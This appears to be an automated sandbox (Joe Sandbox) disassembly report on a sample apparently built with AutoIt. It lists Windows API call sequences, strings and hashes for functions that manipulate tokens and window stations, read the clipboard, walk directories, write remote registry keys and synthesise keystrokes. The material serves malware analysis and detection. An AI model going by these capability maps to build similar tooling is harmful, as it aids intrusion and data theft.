                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E5D018
                                          • SendMessageW.USER32 ref: 00E5D03F
                                          • SendMessageW.USER32(?,00001030,?,00E5B602), ref: 00E5D145
                                          • SetCapture.USER32(?), ref: 00E5D177
                                          • ClientToScreen.USER32(?,?), ref: 00E5D1DC
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E5D203
                                          • ReleaseCapture.USER32 ref: 00E5D20E
                                          • GetCursorPos.USER32(?), ref: 00E5D248
                                          • ScreenToClient.USER32(?,?), ref: 00E5D255
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E5D2B1
                                          • SendMessageW.USER32 ref: 00E5D2DF
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E5D31C
                                          • SendMessageW.USER32 ref: 00E5D34B
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E5D36C
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E5D37B
                                          • GetCursorPos.USER32(?), ref: 00E5D39B
                                          • ScreenToClient.USER32(?,?), ref: 00E5D3A8
                                          • GetParent.USER32(?), ref: 00E5D3C8
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E5D431
                                          • SendMessageW.USER32 ref: 00E5D462
                                          • ClientToScreen.USER32(?,?), ref: 00E5D4C0
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E5D4F0
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E5D51A
                                          • SendMessageW.USER32 ref: 00E5D53D
                                          • ClientToScreen.USER32(?,?), ref: 00E5D58F
                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E5D5C3
                                            • Part of subcall function 00DD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DD25EC
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E5D65F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F
                                          • API String ID: 302779176-4164748364
                                          • Opcode ID: 5b2c8ab55ba34fb9905434541c37a7452d7f8f47d2c91488ea5a46d18de13a5f
                                          • Instruction ID: d200f546674231d41b0e73f6887bb2c55655f16eb7c6dd124837c82d6ce581b4
                                          • Opcode Fuzzy Hash: 5b2c8ab55ba34fb9905434541c37a7452d7f8f47d2c91488ea5a46d18de13a5f
                                          • Instruction Fuzzy Hash: 8442A230204341AFD725CF28C895FAABBF5FF48319F24191EFA55A72A0D7719858CB92
                                          APIs
                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00E5873F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: %d/%02d/%02d
                                          • API String ID: 3850602802-328681919
                                          • Opcode ID: b2fa1822d0a25925903de7d18cac1f465ed4bc8c1e1ba5bca042baf564124df2
                                          • Instruction ID: 51e4d2b44250fd20602cd22091983df06ac4c8b2c47cf92fad7ae1ed6e9e3db4
                                          • Opcode Fuzzy Hash: b2fa1822d0a25925903de7d18cac1f465ed4bc8c1e1ba5bca042baf564124df2
                                          • Instruction Fuzzy Hash: F612D470500208AFEB258F25CD49FAB7BF4EF49316F10596AF915FA1A1DF708949CB60
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove$_memset
                                          • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                          • API String ID: 1357608183-1798697756
                                          • Opcode ID: 150b157ffff3f190007bf0a7f7676f40f5a98c46829573d552cbffb6f1fce635
                                          • Instruction ID: 6cb842698acb4b17ba22b5c1fbb90020ce40e9a2559f284830a994670a86c1b9
                                          • Opcode Fuzzy Hash: 150b157ffff3f190007bf0a7f7676f40f5a98c46829573d552cbffb6f1fce635
                                          • Instruction Fuzzy Hash: 7C93C271A00229DFDB24DF68D881BADB7B1FF48314F25916AE945FB280E7749E81CB50
                                          APIs
                                          • GetForegroundWindow.USER32(00000000,?), ref: 00DD4A3D
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E0DA8E
                                          • IsIconic.USER32(?), ref: 00E0DA97
                                          • ShowWindow.USER32(?,00000009), ref: 00E0DAA4
                                          • SetForegroundWindow.USER32(?), ref: 00E0DAAE
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E0DAC4
                                          • GetCurrentThreadId.KERNEL32 ref: 00E0DACB
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E0DAD7
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E0DAE8
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E0DAF0
                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00E0DAF8
                                          • SetForegroundWindow.USER32(?), ref: 00E0DAFB
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0DB10
                                          • keybd_event.USER32(00000012,00000000), ref: 00E0DB1B
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0DB25
                                          • keybd_event.USER32(00000012,00000000), ref: 00E0DB2A
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0DB33
                                          • keybd_event.USER32(00000012,00000000), ref: 00E0DB38
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0DB42
                                          • keybd_event.USER32(00000012,00000000), ref: 00E0DB47
                                          • SetForegroundWindow.USER32(?), ref: 00E0DB4A
                                          • AttachThreadInput.USER32(?,?,00000000), ref: 00E0DB71
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          • Opcode ID: c605fd4330c5f74a643fa8ee82adb94d59c35efe14176756fe32051545e36286
                                          • Instruction ID: 85f5ba42c698ef9e259da2739934b5137b1077029fbab6a7c89b51e35213361a
                                          • Opcode Fuzzy Hash: c605fd4330c5f74a643fa8ee82adb94d59c35efe14176756fe32051545e36286
                                          • Instruction Fuzzy Hash: 56315E71A40318BEEB246BA29C49F7F3E6CEB44B51F114425FA04FA1D0D6B05D50ABA0
                                          APIs
                                            • Part of subcall function 00E28CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E28D0D
                                            • Part of subcall function 00E28CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E28D3A
                                            • Part of subcall function 00E28CC3: GetLastError.KERNEL32 ref: 00E28D47
                                          • _memset.LIBCMT ref: 00E2889B
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E288ED
                                          • CloseHandle.KERNEL32(?), ref: 00E288FE
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E28915
                                          • GetProcessWindowStation.USER32 ref: 00E2892E
                                          • SetProcessWindowStation.USER32(00000000), ref: 00E28938
                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E28952
                                            • Part of subcall function 00E28713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E28851), ref: 00E28728
                                            • Part of subcall function 00E28713: CloseHandle.KERNEL32(?,?,00E28851), ref: 00E2873A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                          • String ID: $default$winsta0$winsta0\default
                                          • API String ID: 2063423040-1685893292
                                          • Opcode ID: 8e209e6c9930715203ae2f2821bf3ebd86f58246ba78b32f9877af9f45484973
                                          • Instruction ID: 98a3028e915df32181dd16127311ab417b6ef314be9ba2981ad2009ed1198cf2
                                          • Opcode Fuzzy Hash: 8e209e6c9930715203ae2f2821bf3ebd86f58246ba78b32f9877af9f45484973
                                          • Instruction Fuzzy Hash: C0815EB1902219AFDF11DFA4ED45AEE7BB8EF04309F08552AF910B6161DF718E14DB60
                                          APIs
                                          • OpenClipboard.USER32(00E5F910), ref: 00E44284
                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E44292
                                          • GetClipboardData.USER32(0000000D), ref: 00E4429A
                                          • CloseClipboard.USER32 ref: 00E442A6
                                          • GlobalLock.KERNEL32(00000000), ref: 00E442C2
                                          • CloseClipboard.USER32 ref: 00E442CC
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00E442E1
                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00E442EE
                                          • GetClipboardData.USER32(00000001), ref: 00E442F6
                                          • GlobalLock.KERNEL32(00000000), ref: 00E44303
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00E44337
                                          • CloseClipboard.USER32 ref: 00E44447
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                          • String ID:
                                          • API String ID: 3222323430-0
                                          • Opcode ID: 43bb35405b77279efcbc0046c7d651103025cab77904a6860ee7f421637183d2
                                          • Instruction ID: dc2f9b83e629f4951cdde33414c95d25bcb88ff1224c8cfcbc48ee7a8c5c7df3
                                          • Opcode Fuzzy Hash: 43bb35405b77279efcbc0046c7d651103025cab77904a6860ee7f421637183d2
                                          • Instruction Fuzzy Hash: 655190B5304306AFD314AF61EC95F6E77A8AF84B01F00492AF555F22E1DB7099088B62
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E3C9F8
                                          • FindClose.KERNEL32(00000000), ref: 00E3CA4C
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E3CA71
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E3CA88
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E3CAAF
                                          • __swprintf.LIBCMT ref: 00E3CAFB
                                          • __swprintf.LIBCMT ref: 00E3CB3E
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                          • __swprintf.LIBCMT ref: 00E3CB92
                                            • Part of subcall function 00DF38D8: __woutput_l.LIBCMT ref: 00DF3931
                                          • __swprintf.LIBCMT ref: 00E3CBE0
                                            • Part of subcall function 00DF38D8: __flsbuf.LIBCMT ref: 00DF3953
                                            • Part of subcall function 00DF38D8: __flsbuf.LIBCMT ref: 00DF396B
                                          • __swprintf.LIBCMT ref: 00E3CC2F
                                          • __swprintf.LIBCMT ref: 00E3CC7E
                                          • __swprintf.LIBCMT ref: 00E3CCCD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                          • API String ID: 3953360268-2428617273
                                          • Opcode ID: bd987d8e7c5e01224fc97484006a6d5991eade8bb0c5ae079b6b504550697380
                                          • Instruction ID: add925122ab78c5fe4c40eb4c1ba9a032339533d62169060082d53d44772ebf6
                                          • Opcode Fuzzy Hash: bd987d8e7c5e01224fc97484006a6d5991eade8bb0c5ae079b6b504550697380
                                          • Instruction Fuzzy Hash: F0A140B2508305ABC710EB64D895DAFB7ECEF94704F40591AF586D3291EB35EA08CB72
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E3F221
                                          • _wcscmp.LIBCMT ref: 00E3F236
                                          • _wcscmp.LIBCMT ref: 00E3F24D
                                          • GetFileAttributesW.KERNEL32(?), ref: 00E3F25F
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00E3F279
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00E3F291
                                          • FindClose.KERNEL32(00000000), ref: 00E3F29C
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00E3F2B8
                                          • _wcscmp.LIBCMT ref: 00E3F2DF
                                          • _wcscmp.LIBCMT ref: 00E3F2F6
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00E3F308
                                          • SetCurrentDirectoryW.KERNEL32(00E8A5A0), ref: 00E3F326
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E3F330
                                          • FindClose.KERNEL32(00000000), ref: 00E3F33D
                                          • FindClose.KERNEL32(00000000), ref: 00E3F34F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1803514871-438819550
                                          • Opcode ID: 3da670951356d43b48fe34fed921b30ab92811229b3066e27da0f7dca944a5a6
                                          • Instruction ID: 8781ddb7d95d89640469fc9fa840c8662ab0aabbcb81f74cd08531b73d7cdbb4
                                          • Opcode Fuzzy Hash: 3da670951356d43b48fe34fed921b30ab92811229b3066e27da0f7dca944a5a6
                                          • Instruction Fuzzy Hash: F031B276900319AFDB14EBB5DC5CAEE7BAC9F08366F145576E904F30A0EB30DA45CA60
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E50BDE
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E5F910,00000000,?,00000000,?,?), ref: 00E50C4C
                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E50C94
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E50D1D
                                          • RegCloseKey.ADVAPI32(?), ref: 00E5103D
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E5104A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Close$ConnectCreateRegistryValue
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 536824911-966354055
                                          • Opcode ID: fb8c65c04fa6c56d261989af273a5746847aae1609e5e90320c4de821d9b18c5
                                          • Instruction ID: c5d5238b1c10ba9e187ff4391f4d5e469cef89d6676904ab778629285327c321
                                          • Opcode Fuzzy Hash: fb8c65c04fa6c56d261989af273a5746847aae1609e5e90320c4de821d9b18c5
                                          • Instruction Fuzzy Hash: D0026F752006119FCB14EF24C895E2AB7E5FF88714F05985DF889AB3A2CB31ED45CBA1
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • DragQueryPoint.SHELL32(?,?), ref: 00E5C917
                                            • Part of subcall function 00E5ADF1: ClientToScreen.USER32(?,?), ref: 00E5AE1A
                                            • Part of subcall function 00E5ADF1: GetWindowRect.USER32(?,?), ref: 00E5AE90
                                            • Part of subcall function 00E5ADF1: PtInRect.USER32(?,?,00E5C304), ref: 00E5AEA0
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E5C980
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E5C98B
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E5C9AE
                                          • _wcscat.LIBCMT ref: 00E5C9DE
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E5C9F5
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E5CA0E
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E5CA25
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E5CA47
                                          • DragFinish.SHELL32(?), ref: 00E5CA4E
                                          • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00E5CB41
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                          • API String ID: 2166380349-3440237614
                                          • Opcode ID: 8034cfd0dfdf90b6155f34ab04ac2aab5c4a31e1aebb52e1498369e087538ebf
                                          • Instruction ID: f9b44836e2b3560cf43fa3cb0d91cb59690c61cbe4518a415808000e888f8235
                                          • Opcode Fuzzy Hash: 8034cfd0dfdf90b6155f34ab04ac2aab5c4a31e1aebb52e1498369e087538ebf
                                          • Instruction Fuzzy Hash: 6C617B71108301AFC715EF61DC85D9FBBF8EF88751F00192EF595A22A1DB709A49CB62
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E3F37E
                                          • _wcscmp.LIBCMT ref: 00E3F393
                                          • _wcscmp.LIBCMT ref: 00E3F3AA
                                            • Part of subcall function 00E345C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E345DC
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00E3F3D9
                                          • FindClose.KERNEL32(00000000), ref: 00E3F3E4
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00E3F400
                                          • _wcscmp.LIBCMT ref: 00E3F427
                                          • _wcscmp.LIBCMT ref: 00E3F43E
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00E3F450
                                          • SetCurrentDirectoryW.KERNEL32(00E8A5A0), ref: 00E3F46E
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E3F478
                                          • FindClose.KERNEL32(00000000), ref: 00E3F485
                                          • FindClose.KERNEL32(00000000), ref: 00E3F497
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 1824444939-438819550
                                          • Opcode ID: cb16d194d82fbf5aba3dffa23ae6101bfcdd68f5a0e17a80f3504148ef1322c1
                                          • Instruction ID: b1b203a56f90b60b1f0d6e486001929a72f4957dffe4734b4c35cb329493e166
                                          • Opcode Fuzzy Hash: cb16d194d82fbf5aba3dffa23ae6101bfcdd68f5a0e17a80f3504148ef1322c1
                                          • Instruction Fuzzy Hash: 0F31E7729012196FDB10AF64EC8CAEF7BAC9F49325F145175E924B30A0D731DE48CA60
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E5C4EC
                                          • GetFocus.USER32 ref: 00E5C4FC
                                          • GetDlgCtrlID.USER32(00000000), ref: 00E5C507
                                          • _memset.LIBCMT ref: 00E5C632
                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E5C65D
                                          • GetMenuItemCount.USER32(?), ref: 00E5C67D
                                          • GetMenuItemID.USER32(?,00000000), ref: 00E5C690
                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E5C6C4
                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E5C70C
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E5C744
                                          • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00E5C779
                                           Memory Dump Source
